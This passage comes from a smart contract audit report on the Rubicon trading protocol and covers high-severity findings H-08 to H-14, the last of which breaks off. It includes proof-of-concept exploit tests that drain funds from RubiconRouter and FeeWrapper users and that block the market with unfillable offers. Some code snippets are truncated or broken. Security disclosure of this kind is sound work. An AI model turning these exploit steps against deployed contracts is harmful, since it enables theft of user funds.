An attacker can steal all funds in RubiconRouter by abusing an error in the token to repay the user in the functions maxBuyAllAmount and maxSellAllAmount (and possibly others).

Please note that the vulnerability exists in the version of RubiconRouter in production and was missed in the C4 audit for Rubicon v1.

Proof of Concept

The function maxBuyAllAmount is used to allow a user to trade using their entire balance of buy_gem. The user transfers the funds to the router and then RubiconMarket is used to find the best offers and execute them. After the trades are performed, the router intends to forward the resulting amount back to the user. Due to a bug, the token used for this transfer is buy_gem again, instead of pay_gem as seen in the same function.

This mismatch allows an attacker to steal all funds stored in the router using the following steps:

  1. Create a fake token (which only the attacker can mint).
  2. Call approveAssetOnMarket with the fake token indirectly. This can be done by trading with ETH and the fake token (e.g. by using offerWithETH and buyAllAmountForETH). Without this step, all calls to maxBuyAllAmount will fail because it doesn’t approve new tokens. We suspect this is partly the reason this was missed by the test and wasn’t used in production.
  3. Offer a small amount of a real token (e.g. USDC) for a large amount of the fake token.
  4. Transfer the fake token to the router so it can buy the offer.
  5. Buy the offer using maxBuyAllAmount and receive the funds in the real token (e.g. USDC) instead of the fake token.

Attached is a POC which performs this flow:

For this POC, please include the following lines in ProtocolDeployment.t.sol:

import "../../contracts/utilities/RubiconRouter.sol";
import "forge-std/StdUtils.sol";

The exploit is performed by the following function:

  function test_WithRouter() public {
    RubiconRouter router = new RubiconRouter();
    router.startErUp(address(market), payable(address(WETH)));

    address attacker = 0x000000000000000000000000000000000000dACa;
    uint256 routerBalance = 1e10;
    deal(address(TUSDC), address(router), routerBalance); // Set this to simulate current router balance
    deal(address(TUSDC), attacker, 1+1);, 1 ether);


    // create fake coin which only attacker can mint
    TokenWithFaucet FAKE = new TokenWithFaucet(attacker, "Fake", "FAKE", 18);

    FAKE.approve(address(market), type(uint256).max);
    TUSDC.approve(address(market), type(uint256).max);
    FAKE.approve(address(router), type(uint256).max);
    TUSDC.approve(address(router), type(uint256).max);

    // Create approval for fake coin (otherwise market will not be able to transfer fake coins from router)
    router.offerWithETH{value: 1}(1 /* ETH */, 1, FAKE, 0, attacker);
    router.buyAllAmountForETH(1, FAKE, 1);

    // Assume TEST is a fake token only attacker can mint
    uint256 fees = (routerBalance * (market.getFeeBPS() + market.makerFee())) / 100_000;
    market.offer(1, TUSDC, routerBalance, FAKE, 0, attacker, attacker); // offer 1 usdc for a lot of fake coin

    assertEq(TUSDC.balanceOf(attacker), 1);

    FAKE.transfer(address(router), routerBalance + fees); // give router fake coins so it can buy the offer
    router.maxBuyAllAmount(TUSDC, FAKE, type(uint256).max); // pay 1 usdc for a lot of usdc instead of fake coin (because of the vulnerability)

    assertGt(TUSDC.balanceOf(attacker), 1);

The output of this test shows that funds were stolen from the router:

Running 1 test for test/foundry-tests/ProtocolDeployment.t.sol:ProtocolDeploymentTest
[PASS] test_WithRouter() (gas: 5216320)

Test result: ok. 1 passed; 0 failed; finished in 20.86ms

The final transfers in maxBuyAllAmount and maxSellAllAmount (see RubiconRouter.sol#L355 and RubiconRouter.sol#L374) should use pay_gem instead of buy_gem.

bghughes (Rubicon) confirmed

HickupHH3 (judge) commented:

Valid, but the router’s OOS.

I’m on the fence for disqualifying it as it should be awarded separately from the audit, but there doesn’t seem to be a bug bounty program. Will include it unless the sponsor decides to give a separate reward.

[H-09] An attacker can steal all tokens of users that use FeeWrapper

Submitted by CryptoCraze, also found by adriro, kaden, sashik_eth, 0xfusion, 0xDING99YA, parlayan_yildizlar_takimi, fs0c, xmxanuel, Inspex, sinarette, 0xNineDec, Banditx0x, nobody2018, ladboy233, azhar and orion.

An attacker can steal all tokens of users that use FeeWrapper.

Proof of Concept

There is no way to distinguish between users that use FeeWrapper. For example, if a user called RubiconRouter through the FeeWrapper, then the msg.sender in RubiconRouter would be the address of FeeWrapper, instead of the address of the user. This will cause all offers to be owned by FeeWrapper.

This means that a malicious attacker can call FeeWrapper and impersonate another user, then withdraw their tokens on their behalf. Here is an example of the flow of events that could occur:

  1. A victim sends their token to some 3rd party that uses the FeeWrapper to call Rubicon contracts.

    • The 3rd party creates an offer through the FeeWrapper.
  2. A malicious attacker calls the FeeWrapper directly, and cancels the offer the victim created. The tokens are returned to the FeeWrapper.
  3. The attacker calls the FeeWrapper again, this time calling transfer, to transfer all the tokens from the FeeWrapper into the attacker’s account.

As seen in the FeeWrapper, it’s possible for anyone to make the FeeWrapper call any function of any contract with any arguments, through rubicall. For example, we can call offer and cancel (of RubiconMarket) and even transfer/transferFrom (of any ERC20 token) on its behalf.

Exploit 1 - 3rd party calls RubiconMarket through the FeeWrapper

This exploit has a victim and an attacker, the victim invests his tokens through some 3rd party that uses the FeeWrapper by creating an offer. Then the attacker calls the FeeWrapper directly, and cancels the victim’s offer, taking all his tokens.

We modified the fee-wrapper.ts test. The setup is almost identical, only we added a victim and an attacker, and modified the pepeFinance to use our example 3rd party.

import { loadFixture } from "@nomicfoundation/hardhat-network-helpers";
import { parseUnits } from "ethers/lib/utils";
import { ethers } from "hardhat";
const { expect } = require("chai");

describe("Fee Wrapper", function () {
  const FEE_TO = "0x0000000000000000000000000000000000000FEE";

  async function deployRubiProtocolFixture() {
    // Contracts are deployed using the first signer/account by default
    const [owner, otherAccount, testMaker, attacker, victim] = await ethers.getSigners();

    const WETH = await ethers.getContractFactory("WETH9");
    const weth = await WETH.deploy();

    const testCoinFactory = await ethers.getContractFactory("TokenWithFaucet");
    const testCoin = await testCoinFactory.deploy(
    const testStableCoin = await testCoinFactory.deploy(
      "Test Stablecoin",

    const ComptrollerFactory = await ethers.getContractFactory("Comptroller");
    const comptroller = await ComptrollerFactory.deploy(); // TODO: Rename to bath house?

    const interestRateModelFacStory = await ethers.getContractFactory(

    // Inputs
    const baseRatePerYear = parseUnits("0.3"); //  TODO: WHAT SHOULD THIS BE?
    const multiplierPerYear = parseUnits("0.02"); //  TODO: WHAT SHOULD THIS BE?
    const irModel = await interestRateModelFactory.deploy(

    const cTokenFactory = await ethers.getContractFactory("CErc20Delegate");
    const cTokenImplementation = await cTokenFactory.deploy();

    // Initialize the market
    const underlying = testCoin.address;
    const interestRateModel = irModel.address;
    const initialExchangeRateMantissa = "200000000000000000000000000"; // TODO: What should this be?
    const name = "Test Bath Token"; // TODO: move this process to Bath House factory
    const symbol = "bathTEST";
    const decimal = 18;

    const becomeImplementationData = "0x"; //TODO: What should this be?

    const cTokenDelegatorFactory = await ethers.getContractFactory(

    const cWETH = await cTokenDelegatorFactory
        owner.address, // Admin!
      .catch((e) => {
        console.log("\nError deploying cWETH!", e.reason, "\n");
    await comptroller._supportMarket(cWETH!.address).catch((e: any) => {
      console.log("\nError supporting new cToken market!", e.reason, "\n");

    const RubiconMarketFactory = await ethers.getContractFactory(
    const rubiconMarket = await RubiconMarketFactory.deploy();
    await rubiconMarket.initialize(testMaker.address);
    await rubiconMarket.setFeeBPS(10);

    // Make a liquid ERC-20 pair for testCoin and testStableCoin. Bid at $90 ask at $110.
    await testCoin.connect(owner).faucet();
    await testStableCoin.connect(owner).faucet();

    await testCoin.connect(owner).transfer(victim.address, parseUnits("999"));

    await testCoin!
      .approve(rubiconMarket.address, parseUnits("1000"));
    await testStableCoin!
      .approve(rubiconMarket.address, parseUnits("1000"));

    await rubiconMarket.functions["offer(uint256,address,uint256,address)"](
      parseUnits("90", 6),
      { from: owner.address }
    await rubiconMarket.functions["offer(uint256,address,uint256,address)"](
      parseUnits("110", 6),
      { from: owner.address }

    const RubiconRouter = await ethers.getContractFactory("RubiconRouter");
    const router = await RubiconRouter.deploy();
    await router.startErUp(rubiconMarket.address, weth.address);

    // fee wrapper
    const FeeWrapper = await ethers.getContractFactory("FeeWrapper");
    const feeWrapper = await FeeWrapper.deploy();

    // 3rd party protocol
    const PepeFinance = await ethers.getContractFactory("Some3rdPartyProtocol");
    const pepeFinance = await PepeFinance.deploy(

    await testCoin!.connect(owner).approve(router.address, parseUnits("320"));

    return {
  it("Exploit steal all tokens from offers created with the `FeeWrapper`", async function () {
    const { testCoin, testStableCoin, pepeFinance, rubiconMarket, feeWrapper, attacker, victim } = await loadFixture(

    let victimBalance = Number(await testCoin.balanceOf(victim.address))
    console.log("The victim has a lot of tokens. Victim's balance = ", victimBalance)

    // Victim puts all his hard-earned money into an offer
    let pay_amt = testCoin.balanceOf(victim.address);
    await testCoin
      .approve(pepeFinance.address, pay_amt);
    await pepeFinance.connect(victim).executeOffer(
    // This is the 3rd offer, hence it would get and ID of 3
    const victimOfferId = 3;

    let attackerBalance = Number(await testCoin.balanceOf(attacker.address))
    console.log("Before attack attacker has no tokens. Attacker's balance = ", attackerBalance)

    let ABI = [
      "function cancel(uint256 id)",
      "function transfer(address to, uint256 amount)"
    let iface = new ethers.utils.Interface(ABI);

    // The attaacker calls `cancel` through the `FeeWrapper`.
    // This steals the victim's tokens and puts them into the FeeWrapper
    let cancelFunc = iface.getFunction("cancel")
    let cancelFuncSig = iface.getSighash(cancelFunc)
    let cancelFuncParams = iface._encodeParams(cancelFunc.inputs, [victimOfferId])
    await feeWrapper.rubicall(
        selector: cancelFuncSig,
        args: cancelFuncParams,
        target: rubiconMarket.address,
        feeParams: {
          feeToken: testCoin.address,
          totalAmount: parseUnits("0"),
          feeAmount: parseUnits("0"),
          feeTo: testCoin.address

    // The attacker calls `transfer` to take the victim's tokens from the FeeWrapper, to the attacker account
    let feeWrapperBalance = await testCoin.balanceOf(feeWrapper.address)
    let transferFunc = iface.getFunction("transfer")
    let transferFuncSig = iface.getSighash(transferFunc)
    let transferFuncParams = iface._encodeParams(transferFunc.inputs, [attacker.address, feeWrapperBalance])
    await feeWrapper.rubicall(
        selector: transferFuncSig,
        args: transferFuncParams,
        target: testCoin.address,
        feeParams: {
          feeToken: testCoin.address,
          totalAmount: 0,
          feeAmount: 0,
          feeTo: testCoin.address

    attackerBalance = Number(await testCoin.balanceOf(attacker.address))
    console.log("After attack, attacker has all of the victims tokens. Attacker's balance = ", attackerBalance)
    victimBalance = Number(await testCoin.balanceOf(victim.address))
    console.log("The victim is left with nothing. Victim's balance = ", victimBalance)

    // Assert that we really stole all victim's tokens

And we created Some3rdPartyProtocol.sol, which is almost identical to Test3rdPartyProtocol.sol, but uses RubiconMarket directly.

// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "../RubiconMarket.sol";
import "../utilities/FeeWrapper.sol";

contract Some3rdPartyProtocol {
    address public feeWrapper;
    uint256 feeType = 10_000; // BPS
    uint256 fee = 10; // 10/10_000
    address feeTo;
    address rubiMarket;

    constructor(address _feeWrapper, address _feeTo, address _rubiMarket) {
        feeWrapper = _feeWrapper;
        feeTo = _feeTo;
        rubiMarket = _rubiMarket;

    function executeOffer(
        uint256 pay_amt,
        address pay_gem,
        uint256 buy_amt,
        address buy_gem,
        uint256 pos
    ) external returns (uint256) {
        uint256[] memory tokenAmounts = new uint256[](2);
        bytes memory id;
        tokenAmounts[0] = pay_amt;
    tokenAmounts[1] = buy_amt;

        IERC20(pay_gem).transferFrom(msg.sender, address(this), pay_amt);
        IERC20(pay_gem).approve(address(feeWrapper), pay_amt);

        // calculate fee to pay using FeeWrapper
        (uint256[] memory new_amounts, uint256[] memory fees_) = FeeWrapper(
        ).calculateFee(tokenAmounts, feeType, fee);

        FeeWrapper.FeeParams memory feeParams = FeeWrapper.FeeParams(

        // update both pay_amt and buy_amt_min with fee deducted
        pay_amt = new_amounts[0];

        // Call rubiMarket.offer
        FeeWrapper.CallParams memory params = FeeWrapper.CallParams(
            abi.encode(pay_amt, pay_gem, buy_amt, buy_gem),
        id = FeeWrapper(feeWrapper).rubicall(params);

        return uint256(bytes32(id));

If you run the test, you’ll see the following output:

$ npx hardhat test test/hardhat-tests/exploit-fee-wrapper.ts

The victim has a lot of tokens. Victim's balance =  `999000000000000000000`
Before attack attacker has no tokens. Attacker's balance =  `0`
After attack, attacker has all of the victims tokens. Attacker's balance =  `998001000000000000000`
The victim is left with nothing. Victim's balance =  `0`

Exploit 2 - 3rd party calls RubiconRouter through the FeeWrapper

To emphasize the problem, we’ll also show that there’s a problem in the example given with Test3rdPartyProtocol.sol. There’s another bug making it impossible to cancel offers through the FeeWrapper, because the FeeWrapper is not capable of accepting eth.

The following test is an exploit using the given Test3rdPartyProtocol.sol which cancels an offer made by another user. Currently, user cancel doesn’t work because FeeWrapper doesn’t have a payable fallback function. This exploit will work when the payable function is added, resulting in stolen funds.

Just to be clear, currently, an honest user making an offer can’t cancel their own offer.

We added the following test to fee-wrapper.ts that shows this exploit:

it("should call offerWithETH via 3d party AND STEAL IT ALL!", async function () {
  const { testCoin, pepeFinance, feeWrapper, router } = await loadFixture(

  const feeToETHBalance0 = await ethers.provider.getBalance(FEE_TO);
  await pepeFinance.executeOfferWithETH(
    { value: parseUnits("9") }
  const feeToETHBalance1 = await ethers.provider.getBalance(FEE_TO);

  // The attacker calls the `FeeWrapper` directly
  let ABI = [
    "function cancelForETH(uint256 id)"
  let iface = new ethers.utils.Interface(ABI);
  let cancelFunc = iface.getFunction("cancelForETH")
  let cancelFuncSig = iface.getSighash(cancelFunc)
  let cancelFuncParams = iface._encodeParams(cancelFunc.inputs, [5])
  console.log(await feeWrapper.rubicall(
      selector: cancelFuncSig,
      args: cancelFuncParams,
      target: router.address,
      feeParams: {
        feeToken: testCoin.address,
        totalAmount: 0,
        feeAmount: 0,
        feeTo: testCoin.address

We recommend converting the FeeWrapper to be a library, instead of a standalone contract (i.e. it shouldn’t have an address) and making the rubicall function private. That way, all the logic of the FeeWrapper can be used by 3rd parties, but no one can call the FeeWrapper directly.

Also, we think FeeWrapper functions should have a reentry guard.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

There are 2 issues actually:

  1. Indistinguishable caller context inside the target call. We see a glimpse of this in the Test3rdPartyProtocol where msg.sender would indeed be the FeeWrapper in the router call.
  2. Rugging users/3rd party protocols from whatever allowance given to the FeeWrapper contract because of the arbitrary target call.

    For example, we can call ~offer and cancel (of RubiconMarket) and even~ transfer/transferFrom (of any ERC20 token) on its behalf.

[H-10] Some offers can’t be cancelled

Submitted by CryptoCraze, also found by joestakey, kaden, jasonxiale, Delvir0, 0xDING99YA, popular00, popular00, carrotsmuggler, Juntao, mrpathfindr, mrpathfindr, said, CRYP70 and jangle.

A normal user can’t cancel their offer when using a specific API.

Proof of Concept

  1. The function offer of SimpleMarket is not overridden by the RubiconMarket contract. Note: that this function is called in the testing example
  2. The cancel function inside SimpleMarket is overridden by the cancel function in RubiconMarket.

When a normal user creates an offer with the SimpleMarket API(1), the offer is not inserted into the linked list _rank.

After some time the user wants to cancel their order. They can only call RubiconMarket’s cancel function(2). When they call cancel what will happen is:

  1. isOfferSorted will return false because the offer was never inserted into _rank.
  2. _hide will also return false, Because the offer was not inserted into the unsorted list _near.
  3. Require check will fail because _hide returned false.

Therefore, the user won’t be able to cancel their offer.


Can’t cancel when creating an offer with SimpleMarket’s offer. Add this to ProtocolDeployment.t.sol:

function test_ExploitCantCancel() public {
  uint id;
  // Create an offer with the function `offer(uint256,ERC20,uint256,ERC20,address,address)` in `SimpleMarket`
  id = market.offer(90e6, TUSDC, 100e18, TEST, address(this), owner);

  // The created offer can't be cancelled! The following line will revert with "Reason: can't hide"
  vm.expectRevert("can't hide");

Override the offer function in SimpleMarket with the offer function in RubiconMarket. Add this offer function:

function offer(
    uint256 pay_amt,
    ERC20 pay_gem,
    uint256 buy_amt,
    ERC20 buy_gem,
    address owner,
    address recipient
) public override can_offer returns (uint256) {

daoio (Rubicon) confirmed

[H-11] RubiconMarket checks slippage incorrectly

Submitted by rvierdiiev, also found by zhuXKET, R2, cccz, sces60107 and ladboy233.

RubiconMarket checks slippage incorrectly, user can loose funds because of that.

Proof of Concept

RubiconMarket.sellAllAmount function has price protection. User should provide min_fill_amount param to that function in order to limit minimum amount they would like to receive.

    function sellAllAmount(
        ERC20 pay_gem,
        uint256 pay_amt,
        ERC20 buy_gem,
        uint256 min_fill_amount
    ) external returns (uint256 fill_amt) {

        uint256 offerId;
        while (pay_amt > 0) {
            //while there is amount to sell
            offerId = getBestOffer(buy_gem, pay_gem); //Get the best offer for the token pair
            require(offerId != 0, "0 offerId"); //Fails if there are not more offers

            // There is a chance that pay_amt is smaller than 1 wei of the other token
            if (
                mul(pay_amt, 1 ether) <
                wdiv(offers[offerId].buy_amt, offers[offerId].pay_amt)
            ) {
                break; //We consider that all amount is sold
            if (pay_amt >= offers[offerId].buy_amt) {
                //If amount to sell is higher or equal than current offer amount to buy
                fill_amt = add(fill_amt, offers[offerId].pay_amt); //Add amount bought to acumulator
                pay_amt = sub(pay_amt, offers[offerId].buy_amt); //Decrease amount to sell
                take(bytes32(offerId), uint128(offers[offerId].pay_amt)); //We take the whole offer
            } else {
                // if lower
                uint256 baux = rmul(
                    mul(pay_amt, 10 ** 9),
                    rdiv(offers[offerId].pay_amt, offers[offerId].buy_amt)
                ) / 10 ** 9;
                fill_amt = add(fill_amt, baux); //Add amount bought to acumulator
                take(bytes32(offerId), uint128(baux)); //We take the portion of the offer that we need
                pay_amt = 0; //All amount is sold
        require(fill_amt >= min_fill_amount, "min_fill_amount isn't filled");
        fill_amt = calcAmountAfterFee(fill_amt);

When order is filling in this function, the full offer amount is added to fill_amt param. fill_amt is the filled amount without fees. Fees will be decreased in the end of function. But slippage is checked before fees are removed.

This is incorrect, as user will provide min_fill_amount that they want to receive after all fees.

The same problem exists for RubiconMarket.buyAllAmount.

Tools Used


First calculate amount without fees, then check slippage:

fill_amt = calcAmountAfterFee(fill_amt);
require(fill_amt >= min_fill_amount, "min_fill_amount isn't filled");

bghughes (Rubicon) confirmed and commented:

Thanks - we messed up some of the fee logic in this build and are keyed in on a robust solution.

For this, we will simply remove fill_amt = calcAmountAfterFee(fill_amt); and extrapolate fees to view function level, keeping them only present in buy, getPayAmountWithFee and getBuyAmountWithFee.

[H-12] DOS of market operations with malicious offers

Submitted by carrotsmuggler, also found by joestakey, Udsen, brgltd, alexzoid, zhuXKET, 0xBeirao, nirlin, halden, McToady, LaScaloneta, immeas, Evo, favelanky, 0Kage, Nyx, Nyx, Udsen, Neon2835, __141345__, bin2chen, whoismatthewmc1, ast3ros, whoismatthewmc1, 0xfusion, CryptoCraze, CryptoCraze, Juntao, SaeedAlipoor01988, Lilyjjo, 0xPiercer, MalfurionWhitehat, CRYP70, 3agle, SaeedAlipoor01988, ktg, ladboy233, ladboy233, sces60107, sces60107, popular00, anodaram, mrpathfindr, and mrpathfindr.

The Rubicon market has two functions that are interesting: buyAllAmount and sellAllAmount. These functions are responsible for using up offers until the entire amount is bought or sold. The contract stores offers in a sorted linked list, each with its unique id, and sorted according to the price. This ensures that the head of the linked list has the best price, or the best offer for either sell or buy. This head is referenced in the code by the mapping _best[address][address] and further worse, offers can be navigated to by calling, similar to a linked list navigation.

When buyAllAmount is called, a while loop is ran, and the best offer is taken out in each iteration using the function getBestOffer() similar to the snippet below:

while (buy_amt > 0) {
            //Meanwhile there is amount to buy
            offerId = getBestOffer(buy_gem, pay_gem); //Get the best offer for the token pair
            require(offerId != 0, "offerId == 0");

The offers are then filled one after the other. However, if an offer is unfillable, or reverts, then the whole transaction reverts. This breaks the functionality of the buyAllAmount function and creates a DOS attack vector.

The standard openzeppelin implementation of the ERC20 token does not support transfers to the zero address. If a transaction tries to send tokens to 0 address, it reverts with ‘ERC20: transfer to the zero address’. Thus, if an offer is created where the receiver of the payment is zero address, that offer can be unfillable. If this offer is created such that it is the best possible price, then this offer will exist at the head of the linked list in the _best variable and thus will be the first offer looked into. Since this offer is unfillable, the entire transaction will revert.

When creating an offer, the user can specify two addresses, the owner address and the recipient address. The contract does not sanitize these addresses and even accepts ‘0 address’ in these fields. These are also the addresses where the payment token is sent when the order is filled.

Thus, a malicious user can create a buy/sell order of a small volume but at a very good price. They can set both the owner and the recipient to ‘0’ when calling offer(). This will create a lucrative unfillable order which will always be called on first. This will lead to all transactions reverting due to this single unfillable offer.

The impact is even more pronounced for the Position.sol contract. Unlike normal users, this contract does not have the ability to select offers by id, and is only filled using buyAllAmount or sellAllAmount. A DOS attack, as described above, will break the functionality of the two mentioned functions and break the whole Position contract, as a result. This can lead to large losses where users are unable to unwind positions before liquidations.

This also has a secondary impact of blocking the creation of future orders. As can be seen here, in the _matcho function, when new offers are created they are first matched with existing offers in the same range. If there is still a balance remaining, a new offer is created. Now if the existing offers are such unfillable orders, it would also block the creation of further new orders, causing another functionality DOS.

Proof of Concept

The POC shows that if the recipient and owner addresses are both set to ‘0’, the order cannot be filed. This order will exist in the linked list sorted by price and thus will be the first order to be filled.

First, change the code in deployRubiconProtocolFixture() where the orders are created here to the following order:

await rubiconMarket.functions[
            parseUnits("110", 6),
            { from: owner.address }

This creates an unfillable order. Now try running the provided test in “can take an offer with 0 makerFee” by using the command: hardhat test --grep "0 makerFee".

This test fails with ‘ERC20: transfer to the zero address’ error, since the order is unfillable. The test body is also copied here as reference:

it("can take an offer with 0 makerFee", async function () {
                const { rubiconMarket, testCoin, owner } = await loadFixture(
                const balanceBefore = await testCoin.balanceOf(owner.address)
                // in TEST
                const quantity = parseUnits("14")

                // amount that should be received with fee deducted (only Protocol fee!)
                const quantityAfterFee = await rubiconMarket.calcAmountAfterFee(

                // buying TEST with USDCT
                await, quantity)
                // saving new balance state
                const balanceAfter = await testCoin.balanceOf(owner.address)

                // validating that owner received proper amount with ONLY protocol fee charged

This shows unfillable orders can be created. If this order exists at the top, it will revert calls from the Position.sol contract.

Tools Used


This requires multiple mitigation steps:

  1. Do not allow ‘0 address’ as owner. This can be enforced with a require statement in the offer() function in SimpleMarket contract.
  2. Unfillable orders can still be created by setting recipient to blacklisted addresses, for tokens like USDT. To navigate this, in the while loop in buyAllAmount, include error handling with try-catch blocks to use the next offer, as the current offer is unfillable.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

The impact is even more pronounced for the Position.sol contract. Unlike normal users, this contract does not have the ability to select offers by id, and is only filled using buyAllAmount or sellAllAmount. A DOS attack as described above will break the functionality of the two mentioned functions, and thus break the whole Position contract as a result. This can lead to large losses where users are unable to unwind positions before liquidations.

This also has a secondary impact of blocking the creation of future orders. As can be seen here, in the _matcho function, when new offers are created, they are first matched with existing offers in the same range, and if there is still a balance remaining, a new offer is created. Now if the existing offers are such unfillable orders, it would also block the creation of further new orders, causing another functionality DOS.

Impact was well described and explained. I consider this to be medium severity though, because it’s on L2s where the mainly supported tokens do not revert on null address (unless proven otherwise).

Satisfactory: has to be similar to best report in impact description (key word I’m looking for is DoSing the Position via buyAllAmount()/sellAllAmount()).

50%: Mentions DoS in some capacity / loss of user funds.

25%: Only mention zero address check with no / little impact description.

After a brief consultation, I’ve come to the following conclusion over non-standard ERC20 implementations:

  • No return of bool/returning false: Excluded because it’s been caught by the 4naly3er.
  • FoT/Rebasing: Isolated impact, doesn’t affect trades of other tokens.
  • Revert on zero value: Low, isolated impact, doesn’t affect trades of other tokens.
  • Revert on null address: Medium, as a substantial number of ERC20 tokens inherit OZ’s implementation that has this check, allowing for DoS.

HickupHH3 (judge) decreased severity to Medium

carrotsmuggler (warden) commented:

Impact was well described and explained. I consider this to be medium severity though, because it’s on L2s where the mainly supported tokens do not revert on null address (unless proven otherwise).

According to uniswap statistics, the top 8 tokens by volume are listed below, and their contracts have been evaluated. For all these tokens, transfers to ‘0 address’ results in a revert.

Token Address
USDT 0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9
USDC 0xaf88d065e77c8cC2239327C5EDb3A432268e5831
weth 0x82aF49447D8a07e3bd95BD0d56f35241523fBab1
wbtc 0x2f2a2543B76A4166549F7aaB2e75Bef0aefC5B0f
arb 0x912CE59144191C1204E64559FE8253a0e49E6548
dai 0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1
bridged usdc 0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8
GMX 0xfc5A1A6EB076a2C7aD06eD22C90d7E710E35ad0a

Every token (except DAI) follows the open-zeppelin standard and has a require block in their _transfer function.

require(_sender != address(0), "BaseToken: transfer from the zero address");
require(_recipient != address(0), "BaseToken: transfer to the zero address");

DAI doesn’t follow the standard, but has a statement which behaves in a similar manner.

Since the vast majority (97%+) of the uniswap transactions involve at least one of these tokens, it is safe to assume that most transactions would be affected by this bug.

Since the severity is high (complete breaking of Position contract), and the likelihood is high (97%+ affected volume), the severity of this bug should be upgraded to High.

HickupHH3 (judge) increased severity to High and commented:


[H-13] When opening a position, the collateral of the previous position is used for borrowing, which makes the user more easily liquidated

Submitted by cccz.

When a user opens a position, if there is collateral in previous positions that have not reached the maximum borrowable amount, this collateral will be used for borrowing, which may cause the user to reach the liquidation threshold, resulting in the user being liquidated.

        uint256 _minted = IERC20(_bathToken).balanceOf(address(this));
	// how much is borrowed on a current loop
        uint256 _loopBorrowed;

        while (_assetAmount <= _desiredAmount) {
            if (_limit == 0) {
		// if collateral already provided
                if (_minted != 0) {
                    uint256 _max = _maxBorrow(_bathToken);

		    // take into account previous collateral
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor).add(

I will use an example to illustrate it:

Consider the WBTC collateralization rate is 0.7.

Alice is long WBTC using 1e8 WBTC and 1.6x leverage, the contract will collateralize 1e8 WBTC and borrow 0.6e8 WBTC, at which point Alice is 0.7 - 0.6/1 = 10% away from the liquidation threshold.

If Alice continues to use 1e8 WBTC and 1.8x leverage to long WBTC, the previous position will be able to borrow 0.1e8 WBTC, plus the 0.7e8 WBTC that was borrowed by collateralizing 1e8 WBTC, which can be covered without further collateralizing and borrowing, resulting in Alice currently being 0.7 - (0.7 + 0.7)/(1+1) = 0 away from the liquidation threshold. I.e. if the price of WBTC drops slightly, Alice will be liquidated.

If under normal circumstances, Alice is long WBTC using 1e8 WBTC and 1.8x leverage, the contract will collateralize 1e8 WBTC and borrow 0.7e8 WBTC, then collateralize 0.7e8 WBTC and borrow 0.1 WBTC, at which point Alice is 0.7 - 0.8/1.7 = 23% from the liquidation threshold.

The following POC indicates that when a user opens a position with 1.6x and 1.8x leverage in succession, the user will reach the liquidation threshold:

    describe("Long positions 📈", function () {
      it("LPOC1", async function () {
        const { owner, testCoin, testStableCoin, Position, rubiconMarket, comptroller } = await loadFixture(
        const TEST_AMOUNT_1 = parseUnits("1");
        const x1_6 = parseUnits("1.6");

        await Position.connect(owner).buyAllAmountWithLeverage(
        console.log("owner liquidity %s",await comptroller.getAccountLiquidity(Position.address));
        const x1_8 = parseUnits("1.8");

        await Position.connect(owner).buyAllAmountWithLeverage(
        console.log("owner liquidity %s",await comptroller.getAccountLiquidity(Position.address));
      it("LPOC2", async function () {
        const { owner, testCoin, testStableCoin, Position, rubiconMarket, comptroller } = await loadFixture(
        const TEST_AMOUNT_1 = parseUnits("1");
        const x1_8 = parseUnits("1.8");

        await Position.connect(owner).buyAllAmountWithLeverage(
        console.log("owner liquidity %s",await comptroller.getAccountLiquidity(Position.address));
  Leverage positions Test
    Pools Utility Test
      Long positions 📈
owner liquidity [
  BigNumber { value: "0" },
  BigNumber { value: "90000000000000000" },
  BigNumber { value: "0" }
owner liquidity [
  BigNumber { value: "0" },
  BigNumber { value: "0" },
  BigNumber { value: "0" }
        ✓ LPOC1
owner liquidity [
  BigNumber { value: "0" },
  BigNumber { value: "347451975478099020" },
  BigNumber { value: "0" }

Proof of Concept

Tools Used


Consider not using collateral from previous positions for borrowing when opening a position.

daoio (Rubicon) disagreed with severity and commented:

Yeah, the issue is correct. It will increase a possibility of being liquidated, though it was an intended behavior.

HickupHH3 (judge) commented:

A bit of similarity with #1180, but conditions to achieve it are different.

Keeping it as High because probability of liquidation at this point is very high, as good as degen trading.

[H-14] Users might get less assets than expected upon migration due to price manipulation attacks

Submitted by 0xNineDec.

It is possible to manipulate the price of BathV2 tokens before a migration and consequently the migrator will receive underpriced V2 tokens, incurring losses.

The migration process of V2Migrator.migrate() hands in the user’s BathV1 balance in exchange of its underlying. Then, proceeds to mint the counterpart of BathV2 tokens providing the same amount of recovered underlying tokens:

function migrate(IBathToken bathTokenV1) external {
    //////////////// V1 WITHDRAWAL ////////////////
    uint256 bathBalance = bathTokenV1.balanceOf(msg.sender);
    require(bathBalance > 0, "migrate: ZERO AMOUNT");

    /// @dev approve first
    bathTokenV1.transferFrom(msg.sender, address(this), bathBalance);

    // withdraw all tokens from the pool
    uint256 amountWithdrawn = bathTokenV1.withdraw(bathBalance);

    //////////////// V2 DEPOSIT ////////////////
    IERC20 underlying = bathTokenV1.underlyingToken();
    address bathTokenV2 = v1ToV2Pools[address(bathTokenV1)];

    underlying.approve(bathTokenV2, amountWithdrawn);
        CErc20Interface(bathTokenV2).mint(amountWithdrawn) == 0,
        "migrate: MINT FAILED"
    /// @dev v2 bathTokens shouldn't be sent to this contract from anywhere other than this function

This process can be abused from external actors when the V2 pool has low liquidity to manipulate the price of the V2 tokens considerably changing the amount of V2 tokens received by the migrating user.

The amount of V2 tokens (CTokens) that are minted are calculated after accruing the respective interests in CToken.mintFresh():

function mintFresh(address minter, uint mintAmount) internal {
    // ... minting checks  ...

    Exp memory exchangeRate = Exp({mantissa: exchangeRateStoredInternal()});

    uint mintTokens = div_(actualMintAmount, exchangeRate);

    * We calculate the new total supply of cTokens and minter token balance, checking for overflow:
    *  totalSupplyNew = totalSupply + mintTokens
    *  accountTokensNew = accountTokens[minter] + mintTokens
    * And write them into storage
    totalSupply = totalSupply + mintTokens;
    accountTokens[minter] = accountTokens[minter] + mintTokens;

    /* We emit a Mint event, and a Transfer event */
    emit Mint(minter, actualMintAmount, mintTokens);
    emit Transfer(address(this), minter, mintTokens);

    /* We call the defense hook */
    // unused function
    // comptroller.mintVerify(address(this), minter, actualMintAmount, mintTokens);


An attacker is able to manipulate the exchangeRate so it harms the subsequent minters:

